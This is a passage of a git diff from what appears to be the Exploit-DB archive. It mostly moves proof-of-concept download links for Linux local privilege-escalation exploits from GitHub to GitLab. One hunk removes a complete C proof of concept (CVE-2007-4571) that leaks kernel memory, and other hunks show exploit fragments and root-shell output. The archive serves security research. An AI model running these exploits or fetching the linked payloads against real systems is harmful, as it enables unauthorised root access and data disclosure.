that produces a buffer overflow: http://www.mediafire.com/file/3540cyrl7o8p1rq/example_error.pdf/file -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47178.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47178.zip \ No newline at end of file diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py index 5eb16e15e..d8b05880d 100755 --- a/exploits/linux/dos/48301.py +++ b/exploits/linux/dos/48301.py @@ -35,4 +35,4 @@ if not bof: # josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py # *** buffer overflow detected ***: dhcp_release terminated # [+] Buffer Overflow detected! -# [*] Offset: 16 +# [*] Offset: 16 \ No newline at end of file diff --git a/exploits/linux/local/10313.c b/exploits/linux/local/10313.c index d65d2ebb6..556c0e548 100644 --- a/exploits/linux/local/10313.c +++ b/exploits/linux/local/10313.c @@ -261,4 +261,4 @@ int main() } return 0; -} +} \ No newline at end of file diff --git a/exploits/linux/local/1596.txt b/exploits/linux/local/1596.txt index 61e2f942d..e68fe3c0e 100644 --- a/exploits/linux/local/1596.txt +++ b/exploits/linux/local/1596.txt @@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0 r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... -# backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1596.tgz (xmodulepath.tgz) +# backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1596.tgz (xmodulepath.tgz) # milw0rm.com [2006-03-20] \ No newline at end of file diff --git a/exploits/linux/local/1831.txt b/exploits/linux/local/1831.txt index ee0b5c5bf..64d681cb6 100644 --- a/exploits/linux/local/1831.txt +++ b/exploits/linux/local/1831.txt @@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function). .bss section is in higher addresses than .dtors section, so, we can't hijack .dtors to.... -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) nitr0us <nitrousenador[at]gmail[dot]com> diff --git a/exploits/linux/local/19803.txt b/exploits/linux/local/19803.txt index 7176884ae..54dbcc721 100644 --- a/exploits/linux/local/19803.txt +++ b/exploits/linux/local/19803.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19803.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19803.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/19813.txt b/exploits/linux/local/19813.txt index 602ea1c00..fe8eb549c 100644 --- a/exploits/linux/local/19813.txt +++ b/exploits/linux/local/19813.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1061/info A vulnerability exists in the kreatecd program for Linux. This program is a graphical front end to the cdrecord program, and is installed setuid root. This program will blindly trust the configuration of the path to cdrecord, as specified by the user. This means that arbitrary programs can be executed as root by an attacker using kreatecd. It appears that graphical interaction is required to exploit this program. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19813.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19813.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/19915.txt b/exploits/linux/local/19915.txt index c4f7fbc8f..a3e404680 100644 --- a/exploits/linux/local/19915.txt +++ b/exploits/linux/local/19915.txt @@ -4,4 +4,4 @@ Some linux distributions (S.u.S.E. 6.4 reported) ship with kscd (a CD player for Red Hat, Linux Mandrake, and Turbo Linux do not currently ship with kscd setgid 'disk'. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19915.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19915.tgz \ No newline at end of file diff --git a/exploits/linux/local/2031.c b/exploits/linux/local/2031.c index ccb35c297..1bf0cca97 100644 --- a/exploits/linux/local/2031.c +++ b/exploits/linux/local/2031.c @@ -105,4 +105,4 @@ int main(void) exit(0); } -// milw0rm.com [2006-07-18] +// milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/linux/local/20843.txt b/exploits/linux/local/20843.txt index d624d4af9..2a3352bcf 100644 --- a/exploits/linux/local/20843.txt +++ b/exploits/linux/local/20843.txt @@ -4,4 +4,4 @@ A heap overflow vulnerability exists in the 'man' system manual pager program. The vulnerability exists due to a length check error when the -S option is given. As a result, it may be possible for a local user to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20843.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20843.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/20926.txt b/exploits/linux/local/20926.txt index f59e6b9ec..527607d7a 100644 --- a/exploits/linux/local/20926.txt +++ b/exploits/linux/local/20926.txt @@ -6,4 +6,4 @@ The vulnerability exists due to the way the program handles manual page files be As a result, it may be possible for local users to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20926.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20926.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21062.txt b/exploits/linux/local/21062.txt index 74ec3553e..e04825704 100644 --- a/exploits/linux/local/21062.txt +++ b/exploits/linux/local/21062.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21062.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21062.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21063.txt b/exploits/linux/local/21063.txt index bd46d7219..94ebca11e 100644 --- a/exploits/linux/local/21063.txt +++ b/exploits/linux/local/21063.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21063.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21063.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21124.txt b/exploits/linux/local/21124.txt index c6d5b89e8..6af4b580a 100644 --- a/exploits/linux/local/21124.txt +++ b/exploits/linux/local/21124.txt @@ -6,4 +6,4 @@ Attackers can exploit this to elevate privileges. Note: There are currently conflicting reports about the exploitability of this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21124.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21124.tgz \ No newline at end of file diff --git a/exploits/linux/local/21229.txt b/exploits/linux/local/21229.txt index ef3bace49..b71dd6871 100644 --- a/exploits/linux/local/21229.txt +++ b/exploits/linux/local/21229.txt @@ -4,4 +4,4 @@ at is a freely available, open source scheduler package. It is included with var Under some circumstances, at does not correctly handle time input. A local user attempting to schedule a task via commandline execution and using a maliciously crafted time format can cause heap corruption in at. As the at program is installed setuid root in most implementations, this could result in the execution of arbitrary code with administrative privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21229.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21229.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21248.txt b/exploits/linux/local/21248.txt index c2a913b77..f3c89c862 100644 --- a/exploits/linux/local/21248.txt +++ b/exploits/linux/local/21248.txt @@ -6,4 +6,4 @@ UML does not correctly protect kernel address space from user programs within th This is a known problem with the current UML implementation. Memory protection may be partially implemented at this time. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21248.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21248.tgz \ No newline at end of file diff --git a/exploits/linux/local/21375.txt b/exploits/linux/local/21375.txt index 41c00fb61..9f617c2de 100644 --- a/exploits/linux/local/21375.txt +++ b/exploits/linux/local/21375.txt @@ -4,4 +4,4 @@ The Internet Software Consortium (ISC) Internet News (INN) project is a powerful Multiple vulnerabilities have been reported in two components of INN, inews and rnews. Reportedly, both are vulnerable to locally exploitable format string problems. Under some systems these binaries may be installed suid root or sgid news, allowing a local attacker to gain elevated privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21375.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21375.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21458.txt b/exploits/linux/local/21458.txt index b580ff38d..6553e3ec8 100644 --- a/exploits/linux/local/21458.txt +++ b/exploits/linux/local/21458.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/4762/info An attacker with root access may be able to write to kernel memory in spite of the security patch provided by grsecurity. The patch operates by redirecting the write() system call, when it is being used to write to a memory device. Unfortunately, there are other methods that can be used to write to kernel memory (such as mapping the device to memory using mmap()). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21458.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21458.tgz \ No newline at end of file diff --git a/exploits/linux/local/21763.txt b/exploits/linux/local/21763.txt index a984a192e..ac5391987 100644 --- a/exploits/linux/local/21763.txt +++ b/exploits/linux/local/21763.txt @@ -4,4 +4,4 @@ Linuxconf is a Linux configuration utility from Solucorp. It is typically instal A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21763.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21763.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/22189.txt b/exploits/linux/local/22189.txt index 099a3e673..c57529413 100644 --- a/exploits/linux/local/22189.txt +++ b/exploits/linux/local/22189.txt @@ -4,4 +4,4 @@ mtink is prone to a locally exploitable buffer overflow condition. This is due t mtink is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if mtink is installed or runs with elevated privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22189.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22189.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/22190.txt b/exploits/linux/local/22190.txt index 1d0b0970f..c5e07c16b 100644 --- a/exploits/linux/local/22190.txt +++ b/exploits/linux/local/22190.txt @@ -4,4 +4,4 @@ It has been reported that a buffer overflow in escputil exists. When supplied wi escputil is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if the utility is installed or runs with elevated privileges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22190.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22190.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/22458.c b/exploits/linux/local/22458.c index 64961a619..e5968d39e 100644 --- a/exploits/linux/local/22458.c +++ b/exploits/linux/local/22458.c @@ -178,4 +178,4 @@ int main(int argc, char **argv) } close(fd_b); -} +} \ No newline at end of file diff --git a/exploits/linux/local/23351.c b/exploits/linux/local/23351.c index 009646c1e..b2a0a0a0d 100644 --- a/exploits/linux/local/23351.c +++ b/exploits/linux/local/23351.c @@ -135,4 +135,4 @@ int main(int argc, char *argv[]) { setenv("LADSPA_PATH",buff,1); execl(BINARY, BINARY, NULL); perror("execl"); -} +} \ No newline at end of file diff --git a/exploits/linux/local/25707.txt b/exploits/linux/local/25707.txt index 6d3526553..841dfe763 100644 --- a/exploits/linux/local/25707.txt +++ b/exploits/linux/local/25707.txt @@ -4,4 +4,4 @@ Both cryptoloop and dm-crypt are reported prone to an information disclosure vul It should be noted that a successful attack would reveal the presence of a watermarked file but not the file contents. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25707.tar.bz2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25707.tar.bz2 \ No newline at end of file diff --git a/exploits/linux/local/29714.txt b/exploits/linux/local/29714.txt index 0d5bd7da5..b4fb298d5 100644 --- a/exploits/linux/local/29714.txt +++ b/exploits/linux/local/29714.txt @@ -30,4 +30,4 @@ to exploit this bug silently. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29714.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29714.tgz \ No newline at end of file diff --git a/exploits/linux/local/30605.c b/exploits/linux/local/30605.c deleted file mode 100644 index 2417fc1a4..000000000 --- a/exploits/linux/local/30605.c +++ /dev/null @@ -1,69 +0,0 @@ -/* -source: https://www.securityfocus.com/bid/25774/info - -/* -The Linux kernel is prone to a local privilege-escalation vulnerability. - -Exploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. - -Versions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. -*/ - - -/* - ***************************************************************************************** - * by Karimo_DM under GPL * - * * - * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability * - * CVE-2007-4571 * - * * - * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version * - * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing * - * parts of kernel memory (reaveling randomly some risky informations). * - * * - * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa * - * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C * - * 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| * - * 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| * - * 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| * - * 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| * - * 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| * - * 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| * - * 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| * - * 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| * - * 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| * - * 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| * - * ... * - * 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .xÎíÚÀC.Ä...M| * - * 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].ì./..B.| * - * 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...Ç.,.Ê.ÝP.ãúÃ.| * - * 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |¢>7I.Ä...Mq..<.'| * - * 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].ì./..B....Ç.,| * - * 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.Ê.ÝP.ãúÃ.¢>7I.Ä| * - * ... * - * * - * * - * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] * - ***************************************************************************************** - */ - -#include <stdio.h> -#include <stdlib.h> -#include <string.h> -#include <fcntl.h> - -#define _SOME_NUM 0xffff - -int main() { - unsigned int j; - char kern_mem[2]; - int fd=open("/proc/driver/snd-page-alloc",O_RDONLY); - for (j=0;j<(unsigned int)_SOME_NUM;j++) { - memset(kern_mem,0,2); - /* That 1 really do the job ;P */ - if (!read(fd,kern_mem,1)) { - close(fd); - fd=open("/proc/driver/snd-page-alloc",O_RDONLY); - } else printf("%c",kern_mem[0]); - } -} diff --git a/exploits/linux/local/31911.txt b/exploits/linux/local/31911.txt index 40c83370b..fd91eb8a7 100644 --- a/exploits/linux/local/31911.txt +++ b/exploits/linux/local/31911.txt @@ -6,6 +6,6 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Vim 7.1.298 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-3.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31911-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31911-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31911-3.zip \ No newline at end of file diff --git a/exploits/linux/local/33395.txt b/exploits/linux/local/33395.txt index 745c3d27b..dbda7fe04 100644 --- a/exploits/linux/local/33395.txt +++ b/exploits/linux/local/33395.txt @@ -6,4 +6,4 @@ Exploits may allow attackers to execute arbitrary code with kernel-level privile Successful exploits will result in the complete compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33395.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33395.tgz \ No newline at end of file diff --git a/exploits/linux/local/34421.c b/exploits/linux/local/34421.c index 2c68993ec..77e31c238 100644 --- a/exploits/linux/local/34421.c +++ b/exploits/linux/local/34421.c @@ -1,5 +1,5 @@ // -// Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34421.tar.gz (CVE-2014-5119.tar.gz) +// Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz (CVE-2014-5119.tar.gz) // // // --------------------------------------------------- diff --git a/exploits/linux/local/34537.txt b/exploits/linux/local/34537.txt index 39a0ce441..cd3753b79 100644 --- a/exploits/linux/local/34537.txt +++ b/exploits/linux/local/34537.txt @@ -6,4 +6,4 @@ Three flaws have been identified that contribute to a weakening of the protectio Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34537.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34537.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/35749.txt b/exploits/linux/local/35749.txt index d942593b9..a13844d71 100644 --- a/exploits/linux/local/35749.txt +++ b/exploits/linux/local/35749.txt @@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35749.rpm (redstarroot.rpm) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35749.rpm (redstarroot.rpm) ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 \ No newline at end of file diff --git a/exploits/linux/local/37168.txt b/exploits/linux/local/37168.txt index e5b6ef838..58ee3d6fd 100644 --- a/exploits/linux/local/37168.txt +++ b/exploits/linux/local/37168.txt @@ -9,6 +9,6 @@ # CVE : N/A Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37168.tgz +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37168.tgz Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html \ No newline at end of file diff --git a/exploits/linux/local/3730.txt b/exploits/linux/local/3730.txt index 81c4dad17..221c42a68 100644 --- a/exploits/linux/local/3730.txt +++ b/exploits/linux/local/3730.txt @@ -1,5 +1,5 @@ ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) # milw0rm.com [2007-04-13] \ No newline at end of file diff --git a/exploits/linux/local/38353.txt b/exploits/linux/local/38353.txt index da086a951..76681f644 100644 --- a/exploits/linux/local/38353.txt +++ b/exploits/linux/local/38353.txt @@ -10,4 +10,4 @@ open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31 Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also opening of input file does not care about links. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38353.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38353.zip \ No newline at end of file diff --git a/exploits/linux/local/39771.txt b/exploits/linux/local/39771.txt index 074f93654..ed26ab71a 100644 --- a/exploits/linux/local/39771.txt +++ b/exploits/linux/local/39771.txt @@ -91,4 +91,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit? Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39771.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39771.zip \ No newline at end of file diff --git a/exploits/linux/local/39772.txt b/exploits/linux/local/39772.txt index 69018e075..3f3b3eb76 100644 --- a/exploits/linux/local/39772.txt +++ b/exploits/linux/local/39772.txt @@ -125,4 +125,4 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id= Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip \ No newline at end of file diff --git a/exploits/linux/local/39992.md b/exploits/linux/local/39992.md index 92ec03d4e..8392e2487 100644 --- a/exploits/linux/local/39992.md +++ b/exploits/linux/local/39992.md @@ -213,4 +213,4 @@ The page spraying is pretty primitive and racy; while it works reliably for me, Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39992.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39992.zip \ No newline at end of file diff --git a/exploits/linux/local/40270.txt b/exploits/linux/local/40270.txt index eafd2c4b0..cfc0c59e1 100644 --- a/exploits/linux/local/40270.txt +++ b/exploits/linux/local/40270.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40270.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40270.zip \ No newline at end of file diff --git a/exploits/linux/local/40489.txt b/exploits/linux/local/40489.txt index c982ab1a3..0537462cd 100644 --- a/exploits/linux/local/40489.txt +++ b/exploits/linux/local/40489.txt @@ -39,4 +39,4 @@ root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40489.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40489.zip \ No newline at end of file diff --git a/exploits/linux/local/40936.html b/exploits/linux/local/40936.html index 61d7f7d87..bfc1d31c1 100644 --- a/exploits/linux/local/40936.html +++ b/exploits/linux/local/40936.html @@ -1,6 +1,6 @@ <!-- Download: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40936.tgz +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40936.tgz --> <html> diff --git a/exploits/linux/local/40937.txt b/exploits/linux/local/40937.txt index 262f15b49..c5a472d21 100644 --- a/exploits/linux/local/40937.txt +++ b/exploits/linux/local/40937.txt @@ -13,4 +13,4 @@ Source: https://donncha.is/2016/12/compromising-ubuntu-desktop/ Download: https://github.com/DonnchaC/ubuntu-apport-exploitation/archive/6ecfdf798f39fdd49b5929240d90a876c1e97ebb.zip -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40937.zip \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40937.zip \ No newline at end of file diff --git a/exploits/linux/local/40943.txt b/exploits/linux/local/40943.txt index 66e8b087e..65a5f800d 100644 --- a/exploits/linux/local/40943.txt +++ b/exploits/linux/local/40943.txt @@ -22,14 +22,14 @@ Today, the demos are videos instead of images. This first video shows a full, re Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video). - Download: https://security.appspot.com/security/spc/gnome_calc_fedora_25_libc_2.24-3.spc -- Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40943-1.flac +- Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40943-1.flac And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups: - https://www.youtube.com/watch?v=wrCLoem6ggM Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video). - Download: https://security.appspot.com/security/spc/xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc -- Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40943-2.mp3 +- Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40943-2.mp3 Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, there’s a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file. diff --git a/exploits/linux/local/40962.txt b/exploits/linux/local/40962.txt index c1d56d3f5..c413d90b6 100644 --- a/exploits/linux/local/40962.txt +++ b/exploits/linux/local/40962.txt @@ -23,4 +23,4 @@ yields a root shell. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40962.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40962.zip \ No newline at end of file diff --git a/exploits/linux/local/41356.txt b/exploits/linux/local/41356.txt index 775459c6e..a867995a0 100644 --- a/exploits/linux/local/41356.txt +++ b/exploits/linux/local/41356.txt @@ -63,4 +63,4 @@ CPU cores. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41356.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip \ No newline at end of file diff --git a/exploits/linux/local/41597.txt b/exploits/linux/local/41597.txt index ce513e2fb..171dc3e52 100644 --- a/exploits/linux/local/41597.txt +++ b/exploits/linux/local/41597.txt @@ -52,4 +52,4 @@ away from the filesystem root. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41597.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41597.zip \ No newline at end of file diff --git a/exploits/linux/local/41973.txt b/exploits/linux/local/41973.txt index 45359b8e2..4e6f0bddb 100644 --- 